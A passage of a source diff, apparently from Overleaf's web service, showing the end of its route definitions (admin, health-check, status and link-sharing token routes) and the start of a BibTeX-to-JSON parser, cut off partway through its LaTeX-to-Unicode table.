webRouter.get('/chrome', function (req, res, next) { + // Match v1 behaviour - this is used for a Chrome web app + if (SessionManager.isUserLoggedIn(req.session)) { + res.redirect('/project') + } else { + res.redirect('/register') + } + }) + + webRouter.get( + '/admin', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.index + ) + + if (!Features.hasFeature('saas')) { + webRouter.post( + '/admin/openEditor', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.openEditor + ) + webRouter.post( + '/admin/closeEditor', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.closeEditor + ) + webRouter.post( + '/admin/disconnectAllUsers', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.disconnectAllUsers + ) + } + webRouter.post( + '/admin/flushProjectToTpds', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.flushProjectToTpds + ) + webRouter.post( + '/admin/pollDropboxForUser', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.pollDropboxForUser + ) + webRouter.post( + '/admin/messages', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.createMessage + ) + webRouter.post( + '/admin/messages/clear', + AuthorizationMiddleware.ensureUserIsSiteAdmin, + AdminController.clearMessages + ) + + privateApiRouter.get('/perfTest', (req, res) => { + plainTextResponse(res, 'hello') + }) + + publicApiRouter.get('/status', (req, res) => { + if (Settings.shuttingDown) { + res.sendStatus(503) // Service unavailable + } else if (!Settings.siteIsOpen) { + plainTextResponse(res, 'web site is closed (web)') + } else if (!Settings.editorIsOpen) { + plainTextResponse(res, 'web editor is closed (web)') + } else { + plainTextResponse(res, 'web is alive (web)') + } + }) + privateApiRouter.get('/status', (req, res) => { + plainTextResponse(res, 'web is alive (api)') + }) + + // used by kubernetes health-check and acceptance tests + webRouter.get('/dev/csrf', (req, res) => { + plainTextResponse(res, res.locals.csrfToken) + }) + + publicApiRouter.get( + '/health_check', + HealthCheckController.checkActiveHandles, + HealthCheckController.check + ) + privateApiRouter.get( + '/health_check', + HealthCheckController.checkActiveHandles, 
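The public /status endpoint above distinguishes three degraded states before reporting healthy. The same decision ladder as a plain function (a sketch; the Settings flags are the ones named above):

function statusBody(settings) {
  if (settings.shuttingDown) return { code: 503, body: '' } // Service unavailable
  if (!settings.siteIsOpen) return { code: 200, body: 'web site is closed (web)' }
  if (!settings.editorIsOpen) return { code: 200, body: 'web editor is closed (web)' }
  return { code: 200, body: 'web is alive (web)' }
}

console.log(statusBody({ siteIsOpen: true, editorIsOpen: true }).body) // 'web is alive (web)'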
+ HealthCheckController.checkApi + ) + publicApiRouter.get( + '/health_check/api', + HealthCheckController.checkActiveHandles, + HealthCheckController.checkApi + ) + privateApiRouter.get( + '/health_check/api', + HealthCheckController.checkActiveHandles, + HealthCheckController.checkApi + ) + publicApiRouter.get( + '/health_check/full', + HealthCheckController.checkActiveHandles, + HealthCheckController.check + ) + privateApiRouter.get( + '/health_check/full', + HealthCheckController.checkActiveHandles, + HealthCheckController.check + ) + + publicApiRouter.get('/health_check/redis', HealthCheckController.checkRedis) + privateApiRouter.get('/health_check/redis', HealthCheckController.checkRedis) + + publicApiRouter.get('/health_check/mongo', HealthCheckController.checkMongo) + privateApiRouter.get('/health_check/mongo', HealthCheckController.checkMongo) + + webRouter.get( + '/status/compiler/:Project_id', + RateLimiterMiddleware.rateLimit(rateLimiters.statusCompiler), + AuthorizationMiddleware.ensureUserCanReadProject, + function (req, res) { + const projectId = req.params.Project_id + // use a valid user id for testing + const testUserId = '123456789012345678901234' + const sendRes = _.once(function (statusCode, message) { + res.status(statusCode) + plainTextResponse(res, message) + ClsiCookieManager.clearServerId(projectId, testUserId, () => {}) + }) // force every compile to a new server + // set a timeout + let handler = setTimeout(function () { + sendRes(500, 'Compiler timed out') + handler = null + }, 10000) + // run the compile + CompileManager.compile( + projectId, + testUserId, + {}, + function (error, status) { + if (handler) { + clearTimeout(handler) + } + if (error) { + sendRes(500, `Compiler returned error ${error.message}`) + } else if (status === 'success') { + sendRes(200, 'Compiler returned in less than 10 seconds') + } else { + sendRes(500, `Compiler returned failure ${status}`) + } + } + ) + } + ) + + webRouter.post('/error/client', function (req, res, next) { + logger.warn( + { err: req.body.error, meta: req.body.meta }, + 'client side error' + ) + metrics.inc('client-side-error') + res.sendStatus(204) + }) + + webRouter.get( + `/read/:token(${TokenAccessController.READ_ONLY_TOKEN_PATTERN})`, + RateLimiterMiddleware.rateLimit(rateLimiters.readOnlyToken), + AnalyticsRegistrationSourceMiddleware.setSource( + 'collaboration', + 'link-sharing' + ), + TokenAccessController.tokenAccessPage, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + webRouter.get( + `/:token(${TokenAccessController.READ_AND_WRITE_TOKEN_PATTERN})`, + RateLimiterMiddleware.rateLimit(rateLimiters.readAndWriteToken), + AnalyticsRegistrationSourceMiddleware.setSource( + 'collaboration', + 'link-sharing' + ), + TokenAccessController.tokenAccessPage, + AnalyticsRegistrationSourceMiddleware.clearSource() + ) + + webRouter.post( + `/:token(${TokenAccessController.READ_AND_WRITE_TOKEN_PATTERN})/grant`, + RateLimiterMiddleware.rateLimit(rateLimiters.grantTokenAccessReadWrite), + TokenAccessController.grantTokenAccessReadAndWrite + ) + + webRouter.post( + `/read/:token(${TokenAccessController.READ_ONLY_TOKEN_PATTERN})/grant`, + RateLimiterMiddleware.rateLimit(rateLimiters.grantTokenAccessReadOnly), + TokenAccessController.grantTokenAccessReadOnly + ) + + webRouter.get('/unsupported-browser', renderUnsupportedBrowserPage) + + webRouter.get('*', ErrorController.notFound) +} + +export default { initialize, rateLimiters } diff --git a/services/web/app/src/tsconfig.json b/services/web/app/src/tsconfig.json 
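The compiler status route above must answer exactly once, whether the compile succeeds, errors, or the 10-second timer fires first; _.once makes that race safe. The pattern in isolation (a sketch, not the route's actual helper):

const _ = require('lodash')

function runWithTimeout(task, onDone, ms = 10000) {
  const done = _.once(onDone) // whichever of timer/callback fires first wins
  const timer = setTimeout(() => done(new Error('Compiler timed out')), ms)
  task(err => {
    clearTimeout(timer)
    done(err)
  })
}

// Usage sketch: a task that finishes well inside the window.
runWithTimeout(cb => setTimeout(cb, 50), err => console.log(err || 'ok')) // 'ok'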
new file mode 100644 index 0000000..126da92 --- /dev/null +++ b/services/web/app/src/tsconfig.json @@ -0,0 +1 @@ +{ "extends": "../../tsconfig.backend.json" } diff --git a/services/web/app/src/util/bib2json.js b/services/web/app/src/util/bib2json.js new file mode 100644 index 0000000..b105ff3 --- /dev/null +++ b/services/web/app/src/util/bib2json.js @@ -0,0 +1,1966 @@ +/* eslint-disable */ +/** + * Parser.js + * Copyright 2012-13 Mayank Lahiri + * mlahiri@gmail.com + * Released under the BSD License. + * + * Modifications 2016 Sharelatex + * Modifications 2017-2020 Overleaf + * + * A forgiving Bibtex parser that can: + * + * (1) operate in streaming or block mode, extracting entries as dictionaries. + * (2) convert Latex special characters to UTF-8. + * (3) best-effort parse malformed entries. + * (4) run in a CommonJS environment or a browser, without any dependencies. + * (5) be advanced-compiled by Google Closure Compiler. + * + * Handwritten as a labor of love, not auto-generated from a grammar. + * + * Modes of usage: + * + * (1) Synchronous, string + * + * var entries = BibtexParser(text); + * console.log(entries); + * + * (2) Asynchronous, stream + * + * function entryCallback(entry) { console.log(entry); } + * var parser = new BibtexParser(entryCallback); + * parser.parse(chunk1); + * parser.parse(chunk2); + * ... + * + * @param {text|function(Object)} arg0 Either a Bibtex string or callback + * function for processing parsed entries. + * @param {array} allowedKeys optimization: do not output key/value pairs that are not on this allowlist + * @constructor + */ +function BibtexParser(arg0, allowedKeys) { + // Determine how this function is to be used + if (typeof arg0 === 'string') { + // Passed a string, synchronous call without 'new' + const entries = [] + function accumulator(entry) { + entries.push(entry) + } + const parser = new BibtexParser(accumulator, allowedKeys) + parser.parse(arg0) + return { + entries, + errors: parser.getErrors(), + } + } + if (typeof arg0 !== 'function') { + throw 'Invalid parser construction.' 
+ } + this.ALLOWEDKEYS_ = allowedKeys || [] + this.reset_(arg0) + this.initMacros_() + return this +} + +/** @enum {number} */ +BibtexParser.prototype.STATES_ = { + ENTRY_OR_JUNK: 0, + OBJECT_TYPE: 1, + ENTRY_KEY: 2, + KV_KEY: 3, + EQUALS: 4, + KV_VALUE: 5, +} +BibtexParser.prototype.reset_ = function (arg0) { + /** @private */ this.DATA_ = {} + /** @private */ this.CALLBACK_ = arg0 + /** @private */ this.CHAR_ = 0 + /** @private */ this.LINE_ = 1 + /** @private */ this.CHAR_IN_LINE_ = 0 + /** @private */ this.SKIPWS_ = true + /** @private */ this.SKIPCOMMENT_ = true + /** @private */ this.SKIPKVPAIR_ = false + /** @private */ this.PARSETMP_ = {} + /** @private */ this.SKIPTILLEOL_ = false + /** @private */ this.VALBRACES_ = null + /** @private */ this.BRACETYPE_ = null + /** @private */ this.BRACECOUNT_ = 0 + /** @private */ this.STATE_ = this.STATES_.ENTRY_OR_JUNK + /** @private */ this.ERRORS_ = [] +} +/** @private */ BibtexParser.prototype.ENTRY_TYPES_ = { + inproceedings: 1, + proceedings: 2, + article: 3, + techreport: 4, + misc: 5, + mastersthesis: 6, + book: 7, + phdthesis: 8, + incollection: 9, + unpublished: 10, + inbook: 11, + manual: 12, + periodical: 13, + booklet: 14, + masterthesis: 15, + conference: 16, + /* additional fields from biblatex */ + artwork: 17, + audio: 18, + bibnote: 19, + bookinbook: 20, + collection: 21, + commentary: 22, + customa: 23, + customb: 24, + customc: 25, + customd: 26, + custome: 27, + customf: 28, + image: 29, + inreference: 30, + jurisdiction: 31, + legal: 32, + legislation: 33, + letter: 34, + movie: 35, + music: 36, + mvbook: 37, + mvcollection: 38, + mvproceedings: 39, + mvreference: 40, + online: 41, + patent: 42, + performance: 43, + reference: 44, + report: 45, + review: 46, + set: 47, + software: 48, + standard: 49, + suppbook: 50, + suppcollection: 51, + thesis: 52, + video: 53, +} +BibtexParser.prototype.initMacros_ = function () { + // macros can be extended by the user via + // @string { macroName = "macroValue" } + /** @private */ this.MACROS_ = { + jan: 'January', + feb: 'February', + mar: 'March', + apr: 'April', + may: 'May', + jun: 'June', + jul: 'July', + aug: 'August', + sep: 'September', + oct: 'October', + nov: 'November', + dec: 'December', + Jan: 'January', + Feb: 'February', + Mar: 'March', + Apr: 'April', + May: 'May', + Jun: 'June', + Jul: 'July', + Aug: 'August', + Sep: 'September', + Oct: 'October', + Nov: 'November', + Dec: 'December', + } +} + +/** + * Gets an array of all errors encountered during parsing. + * Array entries are of the format: + * [ line number, character in line, character in stream, error text ] + * + * @returns Array<Array> + * @public + */ +BibtexParser.prototype.getErrors = function () { + return this.ERRORS_ +} + +/** + * Processes a chunk of data + * @public + */ +BibtexParser.prototype.parse = function (chunk) { + for (let i = 0; i < chunk.length; i++) this.processCharacter_(chunk[i]) +} + +/** + * Logs error at current stream position. + * + * @private + */ +BibtexParser.prototype.error_ = function (text) { + this.ERRORS_.push([this.LINE_, this.CHAR_IN_LINE_, this.CHAR_, text]) +} + +/** + * Called after an entire entry has been parsed from the stream. + * Performs post-processing and invokes the entry callback pointed to by + * this.CALLBACK_. Parsed (but unprocessed) entry data is in this.DATA_. 
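Following the usage notes in the header comment, the synchronous form returns the parsed entries plus any recoverable errors. A small sketch, assuming the module exports BibtexParser; the entry shape (EntryType, EntryKey, Fields) follows processEntry_ below:

const { entries, errors } = BibtexParser(
  '@book{knuth84, title={The Art of Computer Programming}}'
)
console.log(entries.length, errors.length) // 1 0
console.log(entries[0].EntryType, entries[0].EntryKey) // 'book knuth84'
console.log(entries[0].Fields.title) // 'The Art of Computer Programming'

// Streaming form: new BibtexParser(entryCallback).parse(chunk) may be fed incrementally.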
+ */
+BibtexParser.prototype.processEntry_ = function () {
+  const data = this.DATA_
+  if (data.Fields)
+    for (const f in data.Fields) {
+      let raw = data.Fields[f]
+
+      // Convert LaTeX/BibTeX special characters to their Unicode equivalents
+      for (let i = 0; i < this.CHARCONV_.length; i++) {
+        const re = this.CHARCONV_[i][0]
+        const rep = this.CHARCONV_[i][1]
+        raw = raw.replace(re, rep)
+      }
+
+      // Basic substitutions
+      raw = raw
+        .replace(/[\n\r\t]/g, ' ')
+        .replace(/\s\s+/g, ' ')
+        .replace(/^\s+|\s+$/g, '')
+
+      // Remove braces and backslashes
+      const len = raw.length
+      let processedArr = []
+      for (let i = 0; i < len; i++) {
+        let c = raw[i]
+        let skip = false
+        if (c == '\\' && i < len - 1) c = raw[++i]
+        else {
+          if (c == '{' || c == '}') skip = true
+        }
+        if (!skip) processedArr.push(c)
+      }
+      data.Fields[f] = processedArr.join('')
+      processedArr = null
+    }
+
+  if (data.ObjectType == 'string') {
+    for (const f in data.Fields) {
+      this.MACROS_[f] = data.Fields[f]
+    }
+  } else {
+    // Parsed a new BibTeX entry
+    this.CALLBACK_(data)
+  }
+}
+
+/**
+ * Processes next character in the stream, invoking the callback after
+ * each entry has been found and processed.
+ *
+ * @private
+ * @param {string} c Next character in input stream
+ */
+BibtexParser.prototype.processCharacter_ = function (c) {
+  // Housekeeping
+  this.CHAR_++
+  this.CHAR_IN_LINE_++
+  if (c == '\n') {
+    this.LINE_++
+    this.CHAR_IN_LINE_ = 1
+  }
+
+  // Convenience states for skipping whitespace when needed
+  if (this.SKIPTILLEOL_) {
+    if (c == '\n') this.SKIPTILLEOL_ = false
+    return
+  }
+  if (this.SKIPCOMMENT_ && c == '%') {
+    this.SKIPTILLEOL_ = true
+    return
+  }
+  if (this.SKIPWS_ && /\s/.test(c)) return
+  this.SKIPWS_ = false
+  this.SKIPCOMMENT_ = false
+  this.SKIPTILLEOL_ = false
+
+  // Main state machine
+  let AnotherIteration = true
+  while (AnotherIteration) {
+    // console.log(this.LINE_, this.CHAR_IN_LINE_, this.STATE_, c)
+    AnotherIteration = false
+    switch (this.STATE_) {
+      // -- Scan for an object marker ('@')
+      // -- Reset temporary data structure in case previous entry was garbled
+      case this.STATES_.ENTRY_OR_JUNK:
+        if (c == '@') {
+          // SUCCESS: Parsed a valid start-of-object marker.
+          // NEXT_STATE: OBJECT_TYPE
+          this.STATE_ = this.STATES_.OBJECT_TYPE
+          this.DATA_ = {
+            ObjectType: '',
+          }
+        }
+        this.BRACETYPE_ = null
+        this.SKIPWS_ = true
+        this.SKIPCOMMENT_ = true
+        break
+
+      // Start at first non-whitespace character after start-of-object '@'
+      // -- Accept [A-Za-z], break on non-matching character
+      // -- Populate this.DATA_.EntryType and this.DATA_.ObjectType
+      case this.STATES_.OBJECT_TYPE:
+        if (/[A-Za-z]/.test(c)) {
+          this.DATA_.ObjectType += c.toLowerCase()
+          this.SKIPWS_ = true
+          this.SKIPCOMMENT_ = true
+        } else {
+          // Break from state and validate object type
+          const ot = this.DATA_.ObjectType
+          if (ot == 'comment') {
+            this.STATE_ = this.STATES_.ENTRY_OR_JUNK
+          } else {
+            if (ot == 'string') {
+              this.DATA_.ObjectType = ot
+              this.DATA_.Fields = {}
+              this.BRACETYPE_ = c
+              this.BRACECOUNT_ = 1
+              this.STATE_ = this.STATES_.KV_KEY
+              this.SKIPWS_ = true
+              this.SKIPCOMMENT_ = true
+              this.PARSETMP_ = {
+                Key: '',
+              }
+            } else {
+              if (ot == 'preamble') {
+                this.STATE_ = this.STATES_.ENTRY_OR_JUNK
+              } else {
+                if (ot in this.ENTRY_TYPES_) {
+                  // SUCCESS: Parsed a valid object type.
+                  // NEXT_STATE: ENTRY_KEY
+                  this.DATA_.ObjectType = 'entry'
+                  this.DATA_.EntryType = ot
+                  this.DATA_.EntryKey = ''
+                  this.STATE_ = this.STATES_.ENTRY_KEY
+                  AnotherIteration = true
+                } else {
+                  // ERROR: Unrecognized object type.
+                  // NEXT_STATE: ENTRY_OR_JUNK
+                  this.error_(
+                    'Unrecognized object type: "' + this.DATA_.ObjectType + '"'
+                  )
+                  this.STATE_ = this.STATES_.ENTRY_OR_JUNK
+                }
+              }
+            }
+          }
+        }
+        break
+
+      // Start at first non-alphabetic character after an entry type
+      // -- Populate this.DATA_.EntryKey
+      case this.STATES_.ENTRY_KEY:
+        if ((c === '{' || c === '(') && this.BRACETYPE_ == null) {
+          this.BRACETYPE_ = c
+          this.BRACECOUNT_ = 1
+          this.SKIPWS_ = true
+          this.SKIPCOMMENT_ = true
+          break
+        }
+        if (/[,%\s]/.test(c)) {
+          if (this.DATA_.EntryKey.length < 1) {
+            // Skip comments and whitespace before entry key
+            this.SKIPWS_ = true
+            this.SKIPCOMMENT_ = true
+          } else {
+            if (this.BRACETYPE_ == null) {
+              // ERROR: No opening brace for object
+              // NEXT_STATE: ENTRY_OR_JUNK
+              this.error_('No opening brace for object.')
+              this.STATE_ = this.STATES_.ENTRY_OR_JUNK
+            } else {
+              // SUCCESS: Parsed an entry key
+              // NEXT_STATE: KV_KEY
+              this.SKIPWS_ = true
+              this.SKIPCOMMENT_ = true
+              AnotherIteration = true
+              this.STATE_ = this.STATES_.KV_KEY
+              this.PARSETMP_.Key = ''
+              this.DATA_.Fields = {}
+            }
+          }
+        } else {
+          this.DATA_.EntryKey += c
+          this.SKIPWS_ = false
+          this.SKIPCOMMENT_ = false
+        }
+        break
+
+      // Start at first non-whitespace/comment character after entry key.
+      // -- Populate this.PARSETMP_.Key
+      case this.STATES_.KV_KEY:
+        // Test for end of entry
+        if (
+          (c == '}' && this.BRACETYPE_ == '{') ||
+          (c == ')' && this.BRACETYPE_ == '(')
+        ) {
+          // SUCCESS: Parsed an entry, possibly incomplete
+          // NEXT_STATE: ENTRY_OR_JUNK
+          this.processEntry_()
+          this.SKIPWS_ = true
+          this.SKIPCOMMENT_ = true
+          this.STATE_ = this.STATES_.ENTRY_OR_JUNK
+          break
+        }
+        if (/[\-A-Za-z:]/.test(c)) {
+          // Add to key
+          this.PARSETMP_.Key += c
+          this.SKIPWS_ = false
+          this.SKIPCOMMENT_ = false
+        } else {
+          // Either end of key or we haven't encountered start of key
+          if (this.PARSETMP_.Key.length < 1) {
+            // Keep going till we see a key
+            this.SKIPWS_ = true
+            this.SKIPCOMMENT_ = true
+          } else {
+            // SUCCESS: Found full key in K/V pair
+            // NEXT_STATE: EQUALS
+            this.SKIPWS_ = true
+            this.SKIPCOMMENT_ = true
+            this.STATE_ = this.STATES_.EQUALS
+            AnotherIteration = true
+
+            if (this.DATA_.ObjectType !== 'string') {
+              // this entry is not a macro
+              // normalize the key to lower case
+              this.PARSETMP_.Key = this.PARSETMP_.Key.toLowerCase()
+
+              // optimization: skip key/value pairs that are not on the allowlist
+              this.SKIPKVPAIR_ =
+                // has allowedKeys set
+                this.ALLOWEDKEYS_.length &&
+                // key is not on the allowlist
+                this.ALLOWEDKEYS_.indexOf(this.PARSETMP_.Key) === -1
+            } else {
+              this.SKIPKVPAIR_ = false
+            }
+          }
+        }
+        break
+
+      // Start at first non-alphabetic character after K/V pair key.
+      case this.STATES_.EQUALS:
+        if (
+          (c == '}' && this.BRACETYPE_ == '{') ||
+          (c == ')' && this.BRACETYPE_ == '(')
+        ) {
+          // ERROR: K/V pair with key but no value
+          // NEXT_STATE: ENTRY_OR_JUNK
+          this.error_(
+            'Key-value pair has key "' + this.PARSETMP_.Key + '", but no value.'
+          )
+          this.processEntry_()
+          this.SKIPWS_ = true
+          this.SKIPCOMMENT_ = true
+          this.STATE_ = this.STATES_.ENTRY_OR_JUNK
+          break
+        }
+        if (c == '=') {
+          // SUCCESS: found an equals sign separating key and value
+          // NEXT_STATE: KV_VALUE
+          this.SKIPWS_ = true
+          this.SKIPCOMMENT_ = true
+          this.STATE_ = this.STATES_.KV_VALUE
+          this.PARSETMP_.Value = []
+          this.VALBRACES_ = { '"': [], '{': [] }
+        }
+        break
+
+      // Start at first non-whitespace/comment character after '='
+      // -- Populate this.PARSETMP_.Value
+      case this.STATES_.KV_VALUE:
+        const delim = this.VALBRACES_
+        // valueCharsArray is the list of characters that make up the
+        // current value
+        const valueCharsArray = this.PARSETMP_.Value
+        let doneParsingValue = false
+
+        // Test for special characters
+        if (c == '"' || c == '{' || c == '}' || c == ',') {
+          if (c == ',') {
+            // This comma can mean:
+            // (1) just another comma literal
+            // (2) end of a macro reference
+            if (delim['"'].length + delim['{'].length === 0) {
+              // end of a macro reference
+              const macro = this.PARSETMP_.Value.join('').trim()
+              if (macro in this.MACROS_) {
+                // Successful macro reference
+                this.PARSETMP_.Value = [this.MACROS_[macro]]
+              } else {
+                // Reference to an undefined macro
+                this.error_('Reference to an undefined macro: ' + macro)
+              }
+              doneParsingValue = true
+            }
+          }
+          if (c == '"') {
+            // This quote can mean:
+            // (1) opening delimiter
+            // (2) closing delimiter
+            // (3) literal, if we have a '{' on the stack
+            if (delim['"'].length + delim['{'].length === 0) {
+              // opening delimiter
+              delim['"'].push(this.CHAR_)
+              this.SKIPWS_ = false
+              this.SKIPCOMMENT_ = false
+              break
+            }
+            if (
+              delim['"'].length == 1 &&
+              delim['{'].length == 0 &&
+              (valueCharsArray.length == 0 ||
+                valueCharsArray[valueCharsArray.length - 1] != '\\')
+            ) {
+              // closing delimiter
+              doneParsingValue = true
+            } else {
+              // literal, add to value
+            }
+          }
+          if (c == '{') {
+            // This brace can mean:
+            // (1) opening delimiter
+            // (2) stacked verbatim delimiter
+            if (
+              valueCharsArray.length == 0 ||
+              valueCharsArray[valueCharsArray.length - 1] != '\\'
+            ) {
+              delim['{'].push(this.CHAR_)
+              this.SKIPWS_ = false
+              this.SKIPCOMMENT_ = false
+            } else {
+              // literal, add to value
+            }
+          }
+          if (c == '}') {
+            // This brace can mean:
+            // (1) closing delimiter
+            // (2) closing stacked verbatim delimiter
+            // (3) end of object definition if value was a macro
+            if (delim['"'].length + delim['{'].length === 0) {
+              // end of object definition, after macro
+              const macro = this.PARSETMP_.Value.join('').trim()
+              if (macro in this.MACROS_) {
+                // Successful macro reference
+                this.PARSETMP_.Value = [this.MACROS_[macro]]
+              } else {
+                // Reference to an undefined macro
+                this.error_('Reference to an undefined macro: ' + macro)
+              }
+              AnotherIteration = true
+              doneParsingValue = true
+            } else {
+              // sometimes imported bibs will have {\},{\\}, {\\\}, {\\\\}, etc for whitespace,
+              // which would otherwise break the parsing. we watch for these occurrences of
+              // 1+ backslashes in an empty bracket pair to gracefully handle the malformed bib file
+              const doubleSlash =
+                valueCharsArray.length >= 2 &&
+                valueCharsArray[valueCharsArray.length - 1] === '\\' && // for \\}
+                valueCharsArray[valueCharsArray.length - 2] === '\\'
+              const singleSlash =
+                valueCharsArray.length >= 2 &&
+                valueCharsArray[valueCharsArray.length - 1] === '\\' && // for {\}
+                valueCharsArray[valueCharsArray.length - 2] === '{'
+
+              if (
+                valueCharsArray.length == 0 ||
+                valueCharsArray[valueCharsArray.length - 1] != '\\' || // for }
+                doubleSlash ||
+                singleSlash
+              ) {
+                if (delim['{'].length > 0) {
+                  // pop stack for stacked verbatim delimiter
+                  delim['{'].splice(delim['{'].length - 1, 1)
+                  if (delim['{'].length + delim['"'].length == 0) {
+                    // closing delimiter
+                    doneParsingValue = true
+                  } else {
+                    // end verbatim block
+                  }
+                }
+              } else {
+                // literal, add to value
+              }
+            }
+          }
+        }
+
+        // If here, then we are either done parsing the value or
+        // have a literal that should be added to the value.
+        if (doneParsingValue) {
+          // SUCCESS: value parsed
+          // NEXT_STATE: KV_KEY
+          this.SKIPWS_ = true
+          this.SKIPCOMMENT_ = true
+          this.STATE_ = this.STATES_.KV_KEY
+          if (!this.SKIPKVPAIR_) {
+            this.DATA_.Fields[this.PARSETMP_.Key] =
+              this.PARSETMP_.Value.join('')
+          }
+          this.PARSETMP_ = { Key: '' }
+          this.VALBRACES_ = null
+        } else {
+          this.PARSETMP_.Value.push(c)
+          if (this.PARSETMP_.Value.length >= 1000 * 20) {
+            // Bail out on runaway values: drop the entry and rescan for the next '@'
+            this.PARSETMP_.Value = []
+            this.STATE_ = this.STATES_.ENTRY_OR_JUNK
+            this.DATA_ = { ObjectType: '' }
+            this.BRACETYPE_ = null
+            this.SKIPWS_ = true
+            this.SKIPCOMMENT_ = true
+          }
+        }
+        break
+    } // end switch (this.STATE_)
+  } // end while(AnotherIteration)
+} // end function processCharacter
+
+/** @private */ BibtexParser.prototype.CHARCONV_ = [
+  [/\\space /g, '\u0020'],
+  [/\\textdollar /g, '\u0024'],
+  [/\\textquotesingle /g, '\u0027'],
+  [/\\ast /g, '\u002A'],
+  [/\\textbackslash /g, '\u005C'],
+  [/\\\^\{\}/g, '\u005E'],
+  [/\\textasciigrave /g, '\u0060'],
+  [/\\lbrace /g, '\u007B'],
+  [/\\vert /g, '\u007C'],
+  [/\\rbrace /g, '\u007D'],
+  [/\\textasciitilde /g, '\u007E'],
+  [/\\textexclamdown /g, '\u00A1'],
+  [/\\textcent /g, '\u00A2'],
+  [/\\textsterling /g, '\u00A3'],
+  [/\\textcurrency /g, '\u00A4'],
+  [/\\textyen /g, '\u00A5'],
+  [/\\textbrokenbar /g, '\u00A6'],
+  [/\\textsection /g, '\u00A7'],
+  [/\\textasciidieresis /g, '\u00A8'],
+  [/\\textcopyright /g, '\u00A9'],
+  [/\\textordfeminine /g, '\u00AA'],
+  [/\\guillemotleft /g, '\u00AB'],
+  [/\\lnot /g, '\u00AC'],
+  [/\\textregistered /g, '\u00AE'],
+  [/\\textasciimacron /g, '\u00AF'],
+  [/\\textdegree /g, '\u00B0'],
+  [/\\pm /g, '\u00B1'],
+  [/\\textasciiacute /g, '\u00B4'],
+  [/\\mathrm\{\\mu\}/g, '\u00B5'],
+  [/\\textparagraph /g, '\u00B6'],
+  [/\\cdot /g, '\u00B7'],
+  [/\\c\{\}/g, '\u00B8'],
+  [/\\textordmasculine /g, '\u00BA'],
+  [/\\guillemotright /g, '\u00BB'],
+  [/\\textonequarter /g, '\u00BC'],
+  [/\\textonehalf /g, '\u00BD'],
+  [/\\textthreequarters /g, '\u00BE'],
+  [/\\textquestiondown /g, '\u00BF'],
+  [/\\`\{A\}/g, '\u00C0'],
+  [/\\'\{A\}/g, '\u00C1'],
+  [/\\\^\{A\}/g, '\u00C2'],
+  [/\\~\{A\}/g, '\u00C3'],
+  [/\\"\{A\}/g, '\u00C4'],
+  [/\\AA /g, '\u00C5'],
+  [/\\AE /g, '\u00C6'],
+  [/\\c\{C\}/g, '\u00C7'],
+  [/\\`\{E\}/g, '\u00C8'],
+  [/\\'\{E\}/g, '\u00C9'],
+  [/\\\^\{E\}/g, '\u00CA'],
+  [/\\"\{E\}/g, '\u00CB'],
+  [/\\`\{I\}/g, '\u00CC'],
+  [/\\'\{I\}/g, '\u00CD'],
+  [/\\\^\{I\}/g, '\u00CE'],
+  [/\\"\{I\}/g, '\u00CF'],
+  [/\\DH /g, '\u00D0'],
+  [/\\~\{N\}/g,
'\u00D1'], + [/\\`\{O\}/g, '\u00D2'], + [/\\'\{O\}/g, '\u00D3'], + [/\\\^\{O\}/g, '\u00D4'], + [/\\~\{O\}/g, '\u00D5'], + [/\\"\{O\}/g, '\u00D6'], + [/\\texttimes /g, '\u00D7'], + [/\\O /g, '\u00D8'], + [/\\`\{U\}/g, '\u00D9'], + [/\\'\{U\}/g, '\u00DA'], + [/\\\^\{U\}/g, '\u00DB'], + [/\\"\{U\}/g, '\u00DC'], + [/\\'\{Y\}/g, '\u00DD'], + [/\\TH /g, '\u00DE'], + [/\\ss /g, '\u00DF'], + [/\\`\{a\}/g, '\u00E0'], + [/\\'\{a\}/g, '\u00E1'], + [/\\\^\{a\}/g, '\u00E2'], + [/\\~\{a\}/g, '\u00E3'], + [/\\"\{a\}/g, '\u00E4'], + [/\\aa /g, '\u00E5'], + [/\\ae /g, '\u00E6'], + [/\\c\{c\}/g, '\u00E7'], + [/\\`\{e\}/g, '\u00E8'], + [/\\'\{e\}/g, '\u00E9'], + [/\\\^\{e\}/g, '\u00EA'], + [/\\"\{e\}/g, '\u00EB'], + [/\\`\{\\i\}/g, '\u00EC'], + [/\\'\{\\i\}/g, '\u00ED'], + [/\\\^\{\\i\}/g, '\u00EE'], + [/\\"\{\\i\}/g, '\u00EF'], + [/\\dh /g, '\u00F0'], + [/\\~\{n\}/g, '\u00F1'], + [/\\`\{o\}/g, '\u00F2'], + [/\\'\{o\}/g, '\u00F3'], + [/\\\^\{o\}/g, '\u00F4'], + [/\\~\{o\}/g, '\u00F5'], + [/\\"\{o\}/g, '\u00F6'], + [/\\div /g, '\u00F7'], + [/\\o /g, '\u00F8'], + [/\\`\{u\}/g, '\u00F9'], + [/\\'\{u\}/g, '\u00FA'], + [/\\\^\{u\}/g, '\u00FB'], + [/\\"\{u\}/g, '\u00FC'], + [/\\'\{y\}/g, '\u00FD'], + [/\\th /g, '\u00FE'], + [/\\"\{y\}/g, '\u00FF'], + [/\\=\{A\}/g, '\u0100'], + [/\\=\{a\}/g, '\u0101'], + [/\\u\{A\}/g, '\u0102'], + [/\\u\{a\}/g, '\u0103'], + [/\\k\{A\}/g, '\u0104'], + [/\\k\{a\}/g, '\u0105'], + [/\\'\{C\}/g, '\u0106'], + [/\\'\{c\}/g, '\u0107'], + [/\\\^\{C\}/g, '\u0108'], + [/\\\^\{c\}/g, '\u0109'], + [/\\.\{C\}/g, '\u010A'], + [/\\.\{c\}/g, '\u010B'], + [/\\v\{C\}/g, '\u010C'], + [/\\v\{c\}/g, '\u010D'], + [/\\v\{D\}/g, '\u010E'], + [/\\v\{d\}/g, '\u010F'], + [/\\DJ /g, '\u0110'], + [/\\dj /g, '\u0111'], + [/\\=\{E\}/g, '\u0112'], + [/\\=\{e\}/g, '\u0113'], + [/\\u\{E\}/g, '\u0114'], + [/\\u\{e\}/g, '\u0115'], + [/\\.\{E\}/g, '\u0116'], + [/\\.\{e\}/g, '\u0117'], + [/\\k\{E\}/g, '\u0118'], + [/\\k\{e\}/g, '\u0119'], + [/\\v\{E\}/g, '\u011A'], 